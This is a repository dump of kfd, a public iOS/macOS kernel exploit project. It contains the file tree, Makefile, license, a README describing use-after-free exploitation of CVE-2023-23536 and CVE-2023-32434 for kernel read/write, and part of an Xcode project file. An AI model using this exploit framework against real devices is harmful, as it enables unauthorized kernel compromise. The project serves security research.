├── .gitignore ├── LICENSE ├── Makefile ├── README.md ├── kfd.xcodeproj ├── project.pbxproj └── project.xcworkspace │ ├── contents.xcworkspacedata │ └── xcshareddata │ └── IDEWorkspaceChecks.plist ├── kfd ├── Assets.xcassets │ ├── AccentColor.colorset │ │ └── Contents.json │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json ├── ContentView.swift ├── Preview Content │ └── Preview Assets.xcassets │ │ └── Contents.json ├── kfd-Bridging-Header.h ├── kfd.entitlements ├── kfdApp.swift ├── libkfd.h └── libkfd │ ├── common.h │ ├── info.h │ ├── info │ ├── dynamic_types │ │ ├── kqworkloop.h │ │ ├── proc.h │ │ ├── task.h │ │ ├── thread.h │ │ ├── uthread.h │ │ └── vm_map.h │ └── static_types │ │ ├── fileglob.h │ │ ├── fileops.h │ │ ├── fileproc.h │ │ ├── fileproc_guard.h │ │ ├── ipc_entry.h │ │ ├── ipc_port.h │ │ ├── ipc_space.h │ │ ├── miscellaneous_types.h │ │ ├── pmap.h │ │ ├── pseminfo.h │ │ ├── psemnode.h │ │ ├── semaphore.h │ │ ├── vm_map_copy.h │ │ ├── vm_map_entry.h │ │ ├── vm_named_entry.h │ │ ├── vm_object.h │ │ └── vm_page.h │ ├── krkw.h │ ├── krkw │ ├── kread │ │ ├── kread_kqueue_workloop_ctl.h │ │ └── kread_sem_open.h │ └── kwrite │ │ ├── kwrite_dup.h │ │ └── kwrite_sem_open.h │ ├── perf.h │ ├── puaf.h │ └── puaf │ ├── physpuppet.h │ └── smith.h ├── macos_kfd.c └── writeups ├── exploiting-puafs.md ├── figures ├── exploiting-puafs-figure1.png ├── exploiting-puafs-figure2.png ├── physpuppet-figure1.png ├── physpuppet-figure2.png ├── physpuppet-figure3.png ├── physpuppet-figure4.png ├── physpuppet-figure5.png ├── physpuppet-figure6.png ├── smith-figure1.png ├── smith-figure2.png ├── smith-figure3.png └── smith-figure4.png ├── physpuppet.md └── smith.md /.gitignore: -------------------------------------------------------------------------------- 1 | macos_kfd 2 | xcuserdata 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Félix Poulin-Bélanger 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | b: 2 | clang -O3 -Wno-deprecated-declarations -o macos_kfd macos_kfd.c 3 | 4 | r: 5 | sync 6 | ./macos_kfd 7 | 8 | br: 9 | make b 10 | make r 11 | 12 | s: 13 | sudo sysctl kern.maxfiles=262144 14 | sudo sysctl kern.maxfilesperproc=262144 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # kfd 2 | 3 | kfd, short for kernel file descriptor, is a project to read and write kernel memory on Apple 4 | devices. It leverages various vulnerabilities that can be exploited to obtain dangling PTEs, which 5 | will be referred to as a PUAF primitive, short for "physical use-after-free". Then, it reallocates 6 | certain kernel objects inside those physical pages and manipulates them directly from user space 7 | through the dangling PTEs in order to achieve a KRKW primitive, short for "kernel read/write". The 8 | exploit code is fully contained in a library, [libkfd](kfd/libkfd.h), but the project also contains 9 | simple executable wrappers for [iOS](kfd/ContentView.swift) and [macOS](macos_kfd.c). The public API 10 | of libkfd is quite small and intuitive: 11 | 12 | ```c 13 | enum puaf_method { 14 | puaf_physpuppet, 15 | puaf_smith, 16 | }; 17 | 18 | enum kread_method { 19 | kread_kqueue_workloop_ctl, 20 | kread_sem_open, 21 | }; 22 | 23 | enum kwrite_method { 24 | kwrite_dup, 25 | kwrite_sem_open, 26 | }; 27 | 28 | u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method); 29 | void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size); 30 | void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size); 31 | void kclose(u64 kfd); 32 | ``` 33 | 34 | `kopen()` conceptually opens a "kernel file descriptor". It takes the following 4 arguments: 35 | 36 | - `puaf_pages`: The target number of physical pages with dangling PTEs. 37 | - `puaf_method`: The method used to obtain the PUAF primitive, with the following options: 38 | - `puaf_physpuppet`: 39 | - This method exploits [CVE-2023-23536][1]. 40 | - Fixed in iOS 16.4 and macOS 13.3. 41 | - Reachable from the App Sandbox but not the WebContent sandbox. 42 | - `puaf_smith`: 43 | - This method exploits [CVE-2023-32434][2]. 44 | - Fixed in iOS 16.5.1 and macOS 13.4.1. 45 | - Reachable from the WebContent sandbox and might have been actively exploited. 46 | - `kread_method`: The method used to obtain the initial `kread()` primitive. 47 | - `kwrite_method`: The method used to obtain the initial `kwrite()` primitive. 48 | 49 | If the exploit is successful, `kopen()` returns a 64-bit opaque file descriptor. In practice, this 50 | is just a user space pointer to a structure needed by libkfd. However, since that structure should 51 | not be accessed outside of the library, it is returned as an opaque integer. If the exploit is 52 | unsuccessful, the library will print an error message, sleep for 30 seconds, then exit with a status 53 | code of 1. It sleeps for 30 seconds because the kernel might panic on exit for certain PUAF methods 54 | that require some cleanup post-KRKW (e.g. `puaf_smith`). 55 | 56 | `kread()` and `kwrite()` are the user space equivalent of `copyout()` and `copyin()`, respectively. 57 | Please note that the options for `kread_method` and `kwrite_method` are described in a separate 58 | [write-up](writeups/exploiting-puafs.md). In addition, the initial primitives granted by those 59 | methods can be used to bootstrap a better KRKW primitive. Finally, `kclose()` simply closes the 60 | kernel file descriptor. They all take the opaque integer returned by `kopen()` as their first 61 | argument. 62 | 63 | [1]: https://support.apple.com/en-us/HT213676 64 | [2]: https://support.apple.com/en-us/HT213814 65 | 66 | --- 67 | 68 | ## What are the supported OS versions and devices? 69 | 70 | The later stage of the exploit makes use of various offsets. For the structures that have identical 71 | offsets across all versions that I tested, I simply included their definitions under the 72 | [static_types](kfd/libkfd/info/static_types/) folder. For the structures that have different 73 | offsets, I built offset tables for them under the [dynamic_types](kfd/libkfd/info/dynamic_types/) 74 | folder. Then, I map the "kern.osversion" of the device to the appropriate index for those offset 75 | tables. Please check the function `info_init()`, located in [info.h](kfd/libkfd/info.h), for the 76 | list of currently supported iOS and macOS versions. However, please note that I only tested the 77 | exploits on an iPhone 14 Pro Max and a MacBook Air (M2 2022). Therefore, it is possible that the 78 | offsets are actually different on other devices, even for the same OS version. Keep this in mind if 79 | you get a "Kernel data abort" panic on a "supported" version. Fortunately, those offsets should all 80 | be easily retrievable from the XNU source code. 81 | 82 | On the other hand, in order to bootstrap the better KRKW primitive, the exploit makes use of certain 83 | static addresses which must be retrieved from the kernelcache. This is a tedious process, which I 84 | only carried out for the kernelcaches of certain iOS versions on the iPhone 14 Pro Max. Please check 85 | the function `perf_init()`, located in [perf.h](kfd/libkfd/perf.h), for the list of currently 86 | supported versions. Note that none of the exploits require the better KRKW primitive in order to 87 | succeed. However, if you plan on doing research based on this project, then it is probably 88 | worthwhile to add support for the better KRKW primitive for your own device! 89 | 90 | --- 91 | 92 | ## How to build and run kfd on an iPhone? 93 | 94 | In Xcode, open the root folder of the project and connect your iOS device. 95 | 96 | - To build the project, select Product > Build (⌘B). 97 | - To run the project, select Product > Run (⌘R), then click on the "kopen" button in the app. 98 | 99 | --- 100 | 101 | ## How to build and run kfd on a Mac? 102 | 103 | In a terminal, navigate to the root folder of the project. 104 | 105 | Optionally, to increase the global and per-process file descriptor limits, which will improve the 106 | success rate especially on multiple consecutive runs, enter the command `make s` and type in the 107 | sudo password. 108 | 109 | - To build the project, enter the command `make b`. 110 | - To run the project, enter the command `make r`. 111 | - To build and run the project at once, enter the command `make br`. 112 | 113 | --- 114 | 115 | ## Where to find detailed write-ups for the exploits? 116 | 117 | This README presented a high-level overview of the kfd project. Once a PUAF primitive has been 118 | achieved, the rest of the exploit is generic. Therefore, I have hoisted the common part of the 119 | exploits in a dedicated write-up: 120 | 121 | - [Exploiting PUAFs](writeups/exploiting-puafs.md) 122 | 123 | In addition, I have split the vulnerability-specific part of the exploits used to achieve the PUAF 124 | primitive into distinct write-ups, listed below in chronological order of discovery: 125 | 126 | - [PhysPuppet](writeups/physpuppet.md) 127 | - [Smith](writeups/smith.md) 128 | 129 | However, please note that these write-ups have been written for an audience that is already familiar 130 | with the XNU virtual memory system. 131 | -------------------------------------------------------------------------------- /kfd.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 56; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA1082A310AE100D1E51A /* kfdApp.swift */; }; 11 | 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA10A2A310AE100D1E51A /* ContentView.swift */; }; 12 | 297BA10D2A310AE200D1E51A /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 297BA10C2A310AE200D1E51A /* Assets.xcassets */; }; 13 | 297BA1112A310AE200D1E51A /* Preview Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 297BA1102A310AE200D1E51A /* Preview Assets.xcassets */; }; 14 | /* End PBXBuildFile section */ 15 | 16 | /* Begin PBXFileReference section */ 17 | 29125B6F2A4C807F0031761B /* miscellaneous_types.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = miscellaneous_types.h; sourceTree = ""; }; 18 | 29125B712A4DD3940031761B /* fileops.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileops.h; sourceTree = ""; }; 19 | 2948BA6E2A3162FD00B2ED3C /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; 20 | 2948BA6F2A31630800B2ED3C /* info.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = info.h; sourceTree = ""; }; 21 | 2948BA702A31631000B2ED3C /* krkw.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = krkw.h; sourceTree = ""; }; 22 | 2948BA712A31631C00B2ED3C /* puaf.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = puaf.h; sourceTree = ""; }; 23 | 2948BA722A31636600B2ED3C /* physpuppet.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = physpuppet.h; sourceTree = ""; }; 24 | 2948BA762A3163AB00B2ED3C /* kread_kqueue_workloop_ctl.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kread_kqueue_workloop_ctl.h; sourceTree = ""; }; 25 | 2948BA772A3163B900B2ED3C /* kread_sem_open.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kread_sem_open.h; sourceTree = ""; }; 26 | 2948BA782A3163C500B2ED3C /* kwrite_dup.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kwrite_dup.h; sourceTree = ""; }; 27 | 2948BA792A3163D200B2ED3C /* kwrite_sem_open.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kwrite_sem_open.h; sourceTree = ""; }; 28 | 2948BA7C2A31644B00B2ED3C /* kqworkloop.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kqworkloop.h; sourceTree = ""; }; 29 | 2948BA7D2A31647D00B2ED3C /* proc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = proc.h; sourceTree = ""; }; 30 | 2948BA7E2A31649400B2ED3C /* task.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = task.h; sourceTree = ""; }; 31 | 2948BA812A3164CC00B2ED3C /* vm_map.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_map.h; sourceTree = ""; }; 32 | 2948BA822A3164E900B2ED3C /* fileproc_guard.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileproc_guard.h; sourceTree = ""; }; 33 | 2948BA832A3164FD00B2ED3C /* fileproc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileproc.h; sourceTree = ""; }; 34 | 2948BA842A31651700B2ED3C /* pseminfo.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pseminfo.h; sourceTree = ""; }; 35 | 2948BA852A31652700B2ED3C /* psemnode.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = psemnode.h; sourceTree = ""; }; 36 | 2948BA862A31653C00B2ED3C /* semaphore.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = semaphore.h; sourceTree = ""; }; 37 | 2948BA872A31655600B2ED3C /* vm_map_entry.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_map_entry.h; sourceTree = ""; }; 38 | 2965065D2A31565B0025D1A7 /* kfd-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "kfd-Bridging-Header.h"; sourceTree = ""; }; 39 | 2965065E2A31565B0025D1A7 /* libkfd.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = libkfd.h; sourceTree = ""; }; 40 | 297BA1052A310AE100D1E51A /* kfd.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = kfd.app; sourceTree = BUILT_PRODUCTS_DIR; }; 41 | 297BA1082A310AE100D1E51A /* kfdApp.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = kfdApp.swift; sourceTree = ""; }; 42 | 297BA10A2A310AE100D1E51A /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; 43 | 297BA10C2A310AE200D1E51A /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 44 | 297BA10E2A310AE200D1E51A /* kfd.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = kfd.entitlements; sourceTree = ""; }; 45 | 297BA1102A310AE200D1E51A /* Preview Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = "Preview Assets.xcassets"; sourceTree = ""; }; 46 | 29A358F32A43B53300C297A1 /* smith.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = smith.h; sourceTree = ""; }; 47 | 29A53F692A32255600BC9544 /* thread.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = thread.h; sourceTree = ""; }; 48 | 29A53F6A2A32255E00BC9544 /* uthread.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = uthread.h; sourceTree = ""; }; 49 | 29A765292A393FCB006617E8 /* perf.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = perf.h; sourceTree = ""; }; 50 | 29A7652B2A3943AB006617E8 /* fileglob.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileglob.h; sourceTree = ""; }; 51 | 29A7652C2A3943B5006617E8 /* ipc_entry.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_entry.h; sourceTree = ""; }; 52 | 29A7652D2A3943BD006617E8 /* ipc_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_port.h; sourceTree = ""; }; 53 | 29A7652E2A3943CB006617E8 /* ipc_space.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_space.h; sourceTree = ""; }; 54 | 29A7652F2A3943DC006617E8 /* pmap.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pmap.h; sourceTree = ""; }; 55 | 29A765302A3943EB006617E8 /* vm_map_copy.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_map_copy.h; sourceTree = ""; }; 56 | 29A765312A3943F6006617E8 /* vm_named_entry.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_named_entry.h; sourceTree = ""; }; 57 | 29A765322A394407006617E8 /* vm_object.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_object.h; sourceTree = ""; }; 58 | 29A765332A394412006617E8 /* vm_page.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_page.h; sourceTree = ""; }; 59 | /* End PBXFileReference section */ 60 | 61 | /* Begin PBXFrameworksBuildPhase section */ 62 | 297BA1022A310AE100D1E51A /* Frameworks */ = { 63 | isa = PBXFrameworksBuildPhase; 64 | buildActionMask = 2147483647; 65 | files = ( 66 | ); 67 | runOnlyForDeploymentPostprocessing = 0; 68 | }; 69 | /* End PBXFrameworksBuildPhase section */ 70 | 71 | /* Begin PBXGroup section */ 72 | 2948BA6A2A3162C600B2ED3C /* libkfd */ = { 73 | isa = PBXGroup; 74 | children = ( 75 | 2948BA6E2A3162FD00B2ED3C /* common.h */, 76 | 2948BA6B2A3162DE00B2ED3C /* info */, 77 | 2948BA6F2A31630800B2ED3C /* info.h */, 78 | 2948BA6C2A3162E400B2ED3C /* krkw */, 79 | 2948BA702A31631000B2ED3C /* krkw.h */, 80 | 29A765292A393FCB006617E8 /* perf.h */, 81 | 2948BA6D2A3162E900B2ED3C /* puaf */, 82 | 2948BA712A31631C00B2ED3C /* puaf.h */, 83 | ); 84 | path = libkfd; 85 | sourceTree = ""; 86 | }; 87 | 2948BA6B2A3162DE00B2ED3C /* info */ = { 88 | isa = PBXGroup; 89 | children = ( 90 | 2948BA7B2A31642200B2ED3C /* dynamic_types */, 91 | 2948BA7A2A31641B00B2ED3C /* static_types */, 92 | ); 93 | path = info; 94 | sourceTree = ""; 95 | }; 96 | 2948BA6C2A3162E400B2ED3C /* krkw */ = { 97 | isa = PBXGroup; 98 | children = ( 99 | 2948BA742A31639800B2ED3C /* kread */, 100 | 2948BA752A31639D00B2ED3C /* kwrite */, 101 | ); 102 | path = krkw; 103 | sourceTree = ""; 104 | }; 105 | 2948BA6D2A3162E900B2ED3C /* puaf */ = { 106 | isa = PBXGroup; 107 | children = ( 108 | 2948BA722A31636600B2ED3C /* physpuppet.h */, 109 | 29A358F32A43B53300C297A1 /* smith.h */, 110 | ); 111 | path = puaf; 112 | sourceTree = ""; 113 | }; 114 | 2948BA742A31639800B2ED3C /* kread */ = { 115 | isa = PBXGroup; 116 | children = ( 117 | 2948BA762A3163AB00B2ED3C /* kread_kqueue_workloop_ctl.h */, 118 | 2948BA772A3163B900B2ED3C /* kread_sem_open.h */, 119 | ); 120 | path = kread; 121 | sourceTree = ""; 122 | }; 123 | 2948BA752A31639D00B2ED3C /* kwrite */ = { 124 | isa = PBXGroup; 125 | children = ( 126 | 2948BA782A3163C500B2ED3C /* kwrite_dup.h */, 127 | 2948BA792A3163D200B2ED3C /* kwrite_sem_open.h */, 128 | ); 129 | path = kwrite; 130 | sourceTree = ""; 131 | }; 132 | 2948BA7A2A31641B00B2ED3C /* static_types */ = { 133 | isa = PBXGroup; 134 | children = ( 135 | 29A7652B2A3943AB006617E8 /* fileglob.h */, 136 | 29125B712A4DD3940031761B /* fileops.h */, 137 | 2948BA822A3164E900B2ED3C /* fileproc_guard.h */, 138 | 2948BA832A3164FD00B2ED3C /* fileproc.h */, 139 | 29A7652C2A3943B5006617E8 /* ipc_entry.h */, 140 | 29A7652D2A3943BD006617E8 /* ipc_port.h */, 141 | 29A7652E2A3943CB006617E8 /* ipc_space.h */, 142 | 29125B6F2A4C807F0031761B /* miscellaneous_types.h */, 143 | 29A7652F2A3943DC006617E8 /* pmap.h */, 144 | 2948BA842A31651700B2ED3C /* pseminfo.h */, 145 | 2948BA852A31652700B2ED3C /* psemnode.h */, 146 | 2948BA862A31653C00B2ED3C /* semaphore.h */, 147 | 29A765302A3943EB006617E8 /* vm_map_copy.h */, 148 | 2948BA872A31655600B2ED3C /* vm_map_entry.h */, 149 | 29A765312A3943F6006617E8 /* vm_named_entry.h */, 150 | 29A765322A394407006617E8 /* vm_object.h */, 151 | 29A765332A394412006617E8 /* vm_page.h */, 152 | ); 153 | path = static_types; 154 | sourceTree = ""; 155 | }; 156 | 2948BA7B2A31642200B2ED3C /* dynamic_types */ = { 157 | isa = PBXGroup; 158 | children = ( 159 | 2948BA7C2A31644B00B2ED3C /* kqworkloop.h */, 160 | 2948BA7D2A31647D00B2ED3C /* proc.h */, 161 | 2948BA7E2A31649400B2ED3C /* task.h */, 162 | 29A53F692A32255600BC9544 /* thread.h */, 163 | 29A53F6A2A32255E00BC9544 /* uthread.h */, 164 | 2948BA812A3164CC00B2ED3C /* vm_map.h */, 165 | ); 166 | path = dynamic_types; 167 | sourceTree = ""; 168 | }; 169 | 297BA0FC2A310AE100D1E51A = { 170 | isa = PBXGroup; 171 | children = ( 172 | 297BA1072A310AE100D1E51A /* kfd */, 173 | 297BA1062A310AE100D1E51A /* Products */, 174 | ); 175 | sourceTree = ""; 176 | }; 177 | 297BA1062A310AE100D1E51A /* Products */ = { 178 | isa = PBXGroup; 179 | children = ( 180 | 297BA1052A310AE100D1E51A /* kfd.app */, 181 | ); 182 | name = Products; 183 | sourceTree = ""; 184 | }; 185 | 297BA1072A310AE100D1E51A /* kfd */ = { 186 | isa = PBXGroup; 187 | children = ( 188 | 297BA10C2A310AE200D1E51A /* Assets.xcassets */, 189 | 297BA10A2A310AE100D1E51A /* ContentView.swift */, 190 | 2965065D2A31565B0025D1A7 /* kfd-Bridging-Header.h */, 191 | 297BA10E2A310AE200D1E51A /* kfd.entitlements */, 192 | 297BA1082A310AE100D1E51A /* kfdApp.swift */, 193 | 2948BA6A2A3162C600B2ED3C /* libkfd */, 194 | 2965065E2A31565B0025D1A7 /* libkfd.h */, 195 | 297BA10F2A310AE200D1E51A /* Preview Content */, 196 | ); 197 | path = kfd; 198 | sourceTree = ""; 199 | }; 200 | 297BA10F2A310AE200D1E51A /* Preview Content */ = { 201 | isa = PBXGroup; 202 | children = ( 203 | 297BA1102A310AE200D1E51A /* Preview Assets.xcassets */, 204 | ); 205 | path = "Preview Content"; 206 | sourceTree = ""; 207 | }; 208 | /* End PBXGroup section */ 209 | 210 | /* Begin PBXNativeTarget section */ 211 | 297BA1042A310AE100D1E51A /* kfd */ = { 212 | isa = PBXNativeTarget; 213 | buildConfigurationList = 297BA1142A310AE200D1E51A /* Build configuration list for PBXNativeTarget "kfd" */; 214 | buildPhases = ( 215 | 297BA1012A310AE100D1E51A /* Sources */, 216 | 297BA1022A310AE100D1E51A /* Frameworks */, 217 | 297BA1032A310AE100D1E51A /* Resources */, 218 | ); 219 | buildRules = ( 220 | ); 221 | dependencies = ( 222 | ); 223 | name = kfd; 224 | productName = kfd; 225 | productReference = 297BA1052A310AE100D1E51A /* kfd.app */; 226 | productType = "com.apple.product-type.application"; 227 | }; 228 | /* End PBXNativeTarget section */ 229 | 230 | /* Begin PBXProject section */ 231 | 297BA0FD2A310AE100D1E51A /* Project object */ = { 232 | isa = PBXProject; 233 | attributes = { 234 | BuildIndependentTargetsInParallel = 1; 235 | LastSwiftUpdateCheck = 1430; 236 | LastUpgradeCheck = 1430; 237 | TargetAttributes = { 238 | 297BA1042A310AE100D1E51A = { 239 | CreatedOnToolsVersion = 14.3.1; 240 | LastSwiftMigration = 1430; 241 | }; 242 | }; 243 | }; 244 | buildConfigurationList = 297BA1002A310AE100D1E51A /* Build configuration list for PBXProject "kfd" */; 245 | compatibilityVersion = "Xcode 14.0"; 246 | developmentRegion = en; 247 | hasScannedForEncodings = 0; 248 | knownRegions = ( 249 | en, 250 | Base, 251 | ); 252 | mainGroup = 297BA0FC2A310AE100D1E51A; 253 | productRefGroup = 297BA1062A310AE100D1E51A /* Products */; 254 | projectDirPath = ""; 255 | projectRoot = ""; 256 | targets = ( 257 | 297BA1042A310AE100D1E51A /* kfd */, 258 | ); 259 | }; 260 | /* End PBXProject section */ 261 | 262 | /* Begin PBXResourcesBuildPhase section */ 263 | 297BA1032A310AE100D1E51A /* Resources */ = { 264 | isa = PBXResourcesBuildPhase; 265 | buildActionMask = 2147483647; 266 | files = ( 267 | 297BA1112A310AE200D1E51A /* Preview Assets.xcassets in Resources */, 268 | 297BA10D2A310AE200D1E51A /* Assets.xcassets in Resources */, 269 | ); 270 | runOnlyForDeploymentPostprocessing = 0; 271 | }; 272 | /* End PBXResourcesBuildPhase section */ 273 | 274 | /* Begin PBXSourcesBuildPhase section */ 275 | 297BA1012A310AE100D1E51A /* Sources */ = { 276 | isa = PBXSourcesBuildPhase; 277 | buildActionMask = 2147483647; 278 | files = ( 279 | 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */, 280 | 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */, 281 | ); 282 | runOnlyForDeploymentPostprocessing = 0; 283 | }; 284 | /* End PBXSourcesBuildPhase section */ 285 | 286 | /* Begin XCBuildConfiguration section */ 287 | 297BA1122A310AE200D1E51A /* Debug */ = { 288 | isa = XCBuildConfiguration; 289 | buildSettings = { 290 | ALWAYS_SEARCH_USER_PATHS = NO; 291 | CLANG_ANALYZER_NONNULL = YES; 292 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 293 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 294 | CLANG_ENABLE_MODULES = YES; 295 | CLANG_ENABLE_OBJC_ARC = YES; 296 | CLANG_ENABLE_OBJC_WEAK = YES; 297 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 298 | CLANG_WARN_BOOL_CONVERSION = YES; 299 | CLANG_WARN_COMMA = YES; 300 | CLANG_WARN_CONSTANT_CONVERSION = YES; 301 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 302 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 303 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 304 | CLANG_WARN_EMPTY_BODY = YES; 305 | CLANG_WARN_ENUM_CONVERSION = YES; 306 | CLANG_WARN_INFINITE_RECURSION = YES; 307 | CLANG_WARN_INT_CONVERSION = YES; 308 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 309 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 310 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 311 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 312 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 313 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 314 | CLANG_WARN_STRICT_PROTOTYPES = YES; 315 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 316 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 317 | CLANG_WARN_UNREACHABLE_CODE = YES; 318 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 319 | COPY_PHASE_STRIP = NO; 320 | DEBUG_INFORMATION_FORMAT = dwarf; 321 | ENABLE_STRICT_OBJC_MSGSEND = YES; 322 | ENABLE_TESTABILITY = YES; 323 | GCC_C_LANGUAGE_STANDARD = gnu11; 324 | GCC_DYNAMIC_NO_PIC = NO; 325 | GCC_NO_COMMON_BLOCKS = YES; 326 | GCC_OPTIMIZATION_LEVEL = 0; 327 | GCC_PREPROCESSOR_DEFINITIONS = ( 328 | "DEBUG=1", 329 | "$(inherited)", 330 | ); 331 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 332 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 333 | GCC_WARN_UNDECLARED_SELECTOR = YES; 334 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 335 | GCC_WARN_UNUSED_FUNCTION = YES; 336 | GCC_WARN_UNUSED_VARIABLE = YES; 337 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 338 | MTL_FAST_MATH = YES; 339 | ONLY_ACTIVE_ARCH = YES; 340 | SWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG; 341 | SWIFT_OPTIMIZATION_LEVEL = "-Onone"; 342 | }; 343 | name = Debug; 344 | }; 345 | 297BA1132A310AE200D1E51A /* Release */ = { 346 | isa = XCBuildConfiguration; 347 | buildSettings = { 348 | ALWAYS_SEARCH_USER_PATHS = NO; 349 | CLANG_ANALYZER_NONNULL = YES; 350 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 351 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 352 | CLANG_ENABLE_MODULES = YES; 353 | CLANG_ENABLE_OBJC_ARC = YES; 354 | CLANG_ENABLE_OBJC_WEAK = YES; 355 | 